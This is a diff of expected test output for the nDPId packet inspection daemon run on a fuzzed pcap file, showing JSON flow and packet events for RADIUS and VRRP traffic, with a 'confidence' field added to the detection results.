 01290{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528997476267,"pkt":"AAAMB6xAABRPqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
@@ -240,39 +240,39 @@
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1528997476761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528997476761,"pkt":"AAAMB6xAABRP+4rqCABFAALHIQ9AAP8RAAAKDEAexuIlAHIQBxQCswAAAVkCqxzt3wAE2R1LMmmDUD0Gdm8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwJQAAADghDQM3N0xbIqZkATUwMzExNDgwMjUwODY0NjI4QHdsYW4uVm6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1528996996259,"flow_last_seen":1528997476957,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":28382,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1528996996259,"flow_last_seen":1528997476957,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":28382,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00559{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997260021,"flow_last_seen":1528997260021,"flow_idle_time":600000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1528997631836,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","l4_proto":85,"flow_datalink":1,"flow_max_packets":3}
 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3}
 01356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1528997632285,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528997632285,"pkt":"AAAMu6xAABRP+4rqCABFAALHIRFAAP9wAAAKDEAexuIZNXIQBxQCswAAAVsCq00mnArJWXX+N3JhhZON0ToaCgBDV8gOBFVTGgwAAFfIDQZ3aWZpGg8ACFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqcAATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxNS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TMDAtNTYtY2QtNmQtNDItNSkeJTZjLaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
-00590{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"ndpi": {"proto":"VRRP","breed":"Acceptable","category":"Network"}}
+00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}}
 00722{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":17664,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528997632478,"pkt":"ABRP+4rqcNuYVcUnRQBFAAEwA2FAAPwRUBrG4hk1CgxAHgcUchABHGYCAlsBFPJGkwRL+pjdA5197qGahcwaCwAAV8gbBVNQQxpuAAABNxA06\/sNxTnxG6ukTqwhWbbA2iqJ9xUQWB4T5BwZI+vaxI+7bs\/vfw\/eMzQ3J3YR5Fh5RZWRNDm4c5zmNtk9aBmMKxf9+K7wySD8NYXouGgH0g5FMhfbrMBBWqKOxwRMjh\/pBwtArUnjATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNmZmLzAwOjU2OmNkOjZkOjQyOjU5LzIyNyUAMjAxMjU0NDIzNRIJU3Vj42VzcxkFU1BDTwYDAgAEUBLN9Y5G45qq3LYn60raic1U"}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":17664}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1528997654780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997654780,"pkt":"AAAMB6xAABRP+4rqCABFAALbtO9AAP8RAAAKDEAexuIZPnIQBxQCxwAAAVwCv7knE2qlA0dSDjfn0lqV5KwaCgAAV8gOBF1TGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqcWATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XeUZpQWNjZXNzBQYAAAAIGjEAAABJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMHAwMDAgYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBmoAAQIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjM5cHBuZXR3b3JrWG9yZxoUAABXyAcOVlpXQzJUZXN0TGFiZAoAAFfICARFVBoQAABXyAoKUyUAbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRElAFcgQzIgVGVzdCBMYWIaCwAAR8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAJbNNBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bS9pRmVjdBoMAAAFgwcGwFBKmVAS3kF7XmN2ldE5ieMRbbfICA=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1528997655006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997655006,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA5NAAPwRJQAlABk+CgxAHgcUchAAzVdGC1wAxX62GNWdpucNZiYPcJ1Tw+4BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyamE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEF+QC\/pRrW1P2OBIB77PLtyYRYAgUAAKO0Q86taQAA4Eb2Dn1+Ei2LAQACCwUAANEKc5kzaUyUHJ2asC+h4v1QEoNkNdC6vGAIe51fKjW9k5g="}
-00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
